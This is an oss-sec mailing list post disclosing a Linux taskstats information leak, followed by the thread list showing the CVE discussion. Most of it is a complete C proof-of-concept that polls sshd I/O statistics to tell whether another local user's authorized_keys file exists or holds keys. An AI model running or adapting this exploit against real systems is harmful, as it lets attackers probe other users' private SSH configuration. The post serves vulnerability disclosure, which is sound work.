oss-sec mailing list archives
taskstats authorized_keys presence infoleak PoC
From: Vasiliy Kulikov <segoon () openwall com>
Date: Tue, 21 Jun 2011 22:18:08 +0400
/*
* This program tries to learn whether ~user/.ssh/authorized_keys exists
* and is nonempty for any user on local machine. It uses world-readable
* taskstats' nature to get somewhat private io statistics information. If
* implant taskstats or /proc/<sshd-pid>/io polling into ssh client, it would be
* possible to learn precise authorized_keys' size (and estimate private
* key's(s') size).
*
* The specific min_rsyscalls bounds are working on the testing machine with
* Linux-3.0-rc2 x86_64 and OpenSSH_5.3p1 Debian-3ubuntu6 with
* UsePrivilegeSeparation=no. Other systems need their own numbers.
*
* gcc ssh_stat_authorized_keys.c -o ssh_stat_authorized_keys
*
* Based on linux-2.6/Documentation/accounting/getdelays.c
*
* by Vasiliy Kulikov <segoon from openwall on com>, 2011/06/21
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <poll.h>
#include <string.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <signal.h>
#include <linux/genetlink.h>
#include <linux/taskstats.h>
#include <linux/cgroupstats.h>
/*
* Generic macros for dealing with netlink sockets. Might be duplicated
* elsewhere. It is recommended that commercial grade applications use
* libnl or libnetlink and use the interfaces provided by the library
*/
#define GENLMSG_DATA(glh) ((void *)(NLMSG_DATA(glh) + GENL_HDRLEN))
#define GENLMSG_PAYLOAD(glh) (NLMSG_PAYLOAD(glh, 0) - GENL_HDRLEN)
#define NLA_DATA(na) ((void *)((char*)(na) + NLA_HDRLEN))
#define NLA_PAYLOAD(len) (len - NLA_HDRLEN)
#define err(code, fmt, arg...) \
do { \
fprintf(stderr, fmt, ##arg); \
exit(code); \
} while (0)
char name[100];
/* Maximum size of response requested or message sent */
#define MAX_MSG_SIZE 1024
/* Maximum number of cpus expected to be specified in a cpumask */
#define MAX_CPUS 32
struct msgtemplate {
struct nlmsghdr n;
struct genlmsghdr g;
char buf[MAX_MSG_SIZE];
};
char cpumask[100+6*MAX_CPUS] = "0,1";
static void usage(void)
{
fprintf(stderr, "getdelays [-dilv] [-w logfile] [-r bufsize] "
"[-m cpumask] [-t tgid] [-p pid]\n");
fprintf(stderr, " -d: print delayacct stats\n");
fprintf(stderr, " -i: print IO accounting (works only with -p)\n");
fprintf(stderr, " -l: listen forever\n");
fprintf(stderr, " -v: debug on\n");
fprintf(stderr, " -C: container path\n");
}
/*
* Create a raw netlink socket and bind
*/
static int create_nl_socket(int protocol)
{
int fd;
struct sockaddr_nl local;
fd = socket(AF_NETLINK, SOCK_RAW, protocol);
if (fd < 0)
return -1;
memset(&local, 0, sizeof(local));
local.nl_family = AF_NETLINK;
if (bind(fd, (struct sockaddr *) &local, sizeof(local)) < 0)
goto error;
return fd;
error:
close(fd);
return -1;
}
static int send_cmd(int sd, __u16 nlmsg_type, __u32 nlmsg_pid,
__u8 genl_cmd, __u16 nla_type,
void *nla_data, int nla_len)
{
struct nlattr *na;
struct sockaddr_nl nladdr;
int r, buflen;
char *buf;
struct msgtemplate msg;
msg.n.nlmsg_len = NLMSG_LENGTH(GENL_HDRLEN);
msg.n.nlmsg_type = nlmsg_type;
msg.n.nlmsg_flags = NLM_F_REQUEST;
msg.n.nlmsg_seq = 0;
msg.n.nlmsg_pid = nlmsg_pid;
msg.g.cmd = genl_cmd;
msg.g.version = 0x1;
na = (struct nlattr *) GENLMSG_DATA(&msg);
na->nla_type = nla_type;
na->nla_len = nla_len + 1 + NLA_HDRLEN;
memcpy(NLA_DATA(na), nla_data, nla_len);
msg.n.nlmsg_len += NLMSG_ALIGN(na->nla_len);
buf = (char *) &msg;
buflen = msg.n.nlmsg_len ;
memset(&nladdr, 0, sizeof(nladdr));
nladdr.nl_family = AF_NETLINK;
while ((r = sendto(sd, buf, buflen, 0, (struct sockaddr *) &nladdr,
sizeof(nladdr))) < buflen) {
if (r > 0) {
buf += r;
buflen -= r;
} else if (errno != EAGAIN)
return -1;
}
return 0;
}
/*
* Probe the controller in genetlink to find the family id
* for the TASKSTATS family
*/
static int get_family_id(int sd)
{
struct {
struct nlmsghdr n;
struct genlmsghdr g;
char buf[256];
} ans;
int id = 0, rc;
struct nlattr *na;
int rep_len;
strcpy(name, TASKSTATS_GENL_NAME);
rc = send_cmd(sd, GENL_ID_CTRL, getpid(), CTRL_CMD_GETFAMILY,
CTRL_ATTR_FAMILY_NAME, (void *)name,
strlen(TASKSTATS_GENL_NAME)+1);
if (rc < 0)
return 0; /* sendto() failure? */
rep_len = recv(sd, &ans, sizeof(ans), 0);
if (ans.n.nlmsg_type == NLMSG_ERROR ||
(rep_len < 0) || !NLMSG_OK((&ans.n), rep_len))
return 0;
na = (struct nlattr *) GENLMSG_DATA(&ans);
na = (struct nlattr *) ((char *) na + NLA_ALIGN(na->nla_len));
if (na->nla_type == CTRL_ATTR_FAMILY_ID) {
id = *(__u16 *) NLA_DATA(na);
}
return id;
}
int main(int argc, char *argv[])
{
int c, rc, rep_len, aggr_len, len2;
__u16 id;
__u32 mypid;
struct nlattr *na;
int nl_sd = -1;
int len = 0;
pid_t cpid;
char username[128] = "root";
unsigned long long min_rsyscalls = 100000, max_rsyscalls = 0;
int count = 0;
int maskset = 1;
int max_count = 10;
struct msgtemplate msg;
struct taskstats *tst;
while (1) {
c = getopt(argc, argv, "u:");
if (c < 0)
break;
switch (c) {
case 'u':
strcpy(username, optarg);
break;
default:
usage();
exit(-1);
}
}
if ((nl_sd = create_nl_socket(NETLINK_GENERIC)) < 0)
err(1, "error creating Netlink socket\n");
mypid = getpid();
id = get_family_id(nl_sd);
if (!id) {
fprintf(stderr, "Error getting family id, errno %d\n", errno);
goto err;
}
rc = send_cmd(nl_sd, id, mypid, TASKSTATS_CMD_GET,
TASKSTATS_CMD_ATTR_REGISTER_CPUMASK,
&cpumask, strlen(cpumask) + 1);
if (rc < 0) {
fprintf(stderr, "error sending register cpumask\n");
goto err;
}
if ((cpid = fork()) == 0) {
char buffer[128];
struct timeval tv;
snprintf(buffer, sizeof(buffer),
"ssh %s@localhost -o PasswordAuthentication=no >/dev/null 2>/dev/null; echo -n .", username);
printf("[*] username: %s\n[*] wait", username);
fflush(stdout);
while (1) {
system(buffer);
if (kill(mypid, 0))
exit(0);
tv.tv_sec = 0;
tv.tv_usec = 100000;
select(0, NULL, NULL, NULL, &tv);
}
}
do {
rep_len = recv(nl_sd, &msg, sizeof(msg), 0);
if (rep_len < 0) {
fprintf(stderr, "nonfatal reply error: errno %d\n",
errno);
continue;
}
if (msg.n.nlmsg_type == NLMSG_ERROR ||
!NLMSG_OK((&msg.n), rep_len)) {
struct nlmsgerr *err = NLMSG_DATA(&msg);
fprintf(stderr, "fatal reply error, errno %d\n",
err->error);
goto done;
}
rep_len = GENLMSG_PAYLOAD(&msg.n);
na = (struct nlattr *) GENLMSG_DATA(&msg);
len = 0;
while (len < rep_len) {
len += NLA_ALIGN(na->nla_len);
switch (na->nla_type) {
case TASKSTATS_TYPE_AGGR_TGID:
/* Fall through */
case TASKSTATS_TYPE_AGGR_PID:
aggr_len = NLA_PAYLOAD(na->nla_len);
len2 = 0;
/* For nested attributes, na follows */
na = (struct nlattr *) NLA_DATA(na);
while (len2 < aggr_len) {
switch (na->nla_type) {
case TASKSTATS_TYPE_STATS:
tst = (struct taskstats *) NLA_DATA(na);
if (strcmp(tst->ac_comm, "sshd"))
break;
if (count++ >= max_count)
goto done;
//printf("rsyscalls: %lu\n", (unsigned long)tst->read_syscalls);
if (max_rsyscalls < tst->read_syscalls)
max_rsyscalls = tst->read_syscalls;
if (min_rsyscalls > tst->read_syscalls)
min_rsyscalls = tst->read_syscalls;
break;
default:
//fprintf(stderr, "Unknown nested" " nla_type %d\n", na->nla_type);
break;
}
len2 += NLA_ALIGN(na->nla_len);
na = (struct nlattr *) ((char *) na + len2);
}
break;
default:
//fprintf(stderr, "Unknown nla_type %d\n", na->nla_type);
case TASKSTATS_TYPE_NULL:
break;
}
na = (struct nlattr *) (GENLMSG_DATA(&msg) + len);
}
} while (1);
done:
kill(cpid, SIGKILL);
sleep(1);
printf("\n[!] min/max read(): %llu/%llu\n[+] ", min_rsyscalls, max_rsyscalls);
/*
* These numbers are system-dependent!
* Profile your system (e.g. on your own account) if you want it to work.
*/
if (min_rsyscalls < 197)
printf("~/%s/.ssh/authorized_keys doesn't exists.\n", username);
else if (min_rsyscalls < 203)
printf("~/%s/.ssh/authorized_keys is empty.\n", username);
else if (min_rsyscalls < 210)
printf("~/%s/.ssh/authorized_keys is not empty.\n", username);
else
printf("~/%s/.ssh/authorized_keys is full of keys!\n", username);
if (maskset) {
rc = send_cmd(nl_sd, id, mypid, TASKSTATS_CMD_GET,
TASKSTATS_CMD_ATTR_DEREGISTER_CPUMASK,
&cpumask, strlen(cpumask) + 1);
//printf("Sent deregister mask, retval %d\n", rc);
if (rc < 0)
err(rc, "error sending deregister cpumask\n");
}
err:
close(nl_sd);
return 0;
}
Current thread:
- taskstats authorized_keys presence infoleak PoC Vasiliy Kulikov (Jun 21)
- Re: taskstats authorized_keys presence infoleak PoC Josh Bressers (Jun 21)
- Re: taskstats authorized_keys presence infoleak PoC Vasiliy Kulikov (Jun 21)
- CVE request: kernel: taskstats/procfs io infoleak (was: taskstats authorized_keys presence infoleak PoC) Vasiliy Kulikov (Jun 24)
- Re: CVE request: kernel: taskstats/procfs io infoleak Vasiliy Kulikov (Jun 25)
- Re: CVE request: kernel: taskstats/procfs io infoleak Eugene Teo (Jun 26)
- Re: [Security] CVE request: kernel: taskstats/procfs io infoleak (was: taskstats authorized_keys presence infoleak PoC) Linus Torvalds (Jun 26)
- Re: [Security] CVE request: kernel: taskstats/procfs io infoleak (was: taskstats authorized_keys presence infoleak PoC) Andrew Morton (Jun 28)
- Re: [Security] CVE request: kernel: taskstats/procfs io infoleak (was: taskstats authorized_keys presence infoleak PoC) Linus Torvalds (Jun 28)
- Re: [Security] CVE request: kernel: taskstats/procfs io infoleak (was: taskstats authorized_keys presence infoleak PoC) Linus Torvalds (Jun 28)
- Re: [Security] CVE request: kernel: taskstats/procfs io infoleak (was: taskstats authorized_keys presence infoleak PoC) Vasiliy Kulikov (Jun 29)
- Re: taskstats authorized_keys presence infoleak PoC Josh Bressers (Jun 21)